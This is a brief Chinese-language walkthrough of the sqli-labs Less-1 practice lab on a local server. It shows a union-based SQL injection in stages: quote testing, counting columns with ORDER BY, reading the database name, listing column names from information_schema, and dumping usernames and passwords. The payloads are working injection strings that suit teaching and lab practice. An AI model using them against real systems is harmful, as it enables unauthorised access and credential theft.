首先通过更改id参数为1,2,3发现页面变化
然后在参数后输入“ ' ”测试,发现报错
可以看到提示,存在' '包装,我们加上--+
http://127.0.0.1:8080/sqli-labs-master/Less-1/?id=1' --+
页面正常,可以判断存在单引号的注入问题。
接下来order by猜解字段
http://127.0.0.1:8080/sqli-labs-master/Less-1/?id=1' and 1=2 order by 4--+
当字段到4是回显错误,说明一共有3个字段。然后显示可显字段
http://127.0.0.1:8080/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,2,3--+
可显字段为2和3.然后查找数据库
http://127.0.0.1:8080/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,database(),3--+
进行爆破
?id=1' AND 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') --+ 得到列名
?id=1' AND 1=2 union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+ 得到用户和密码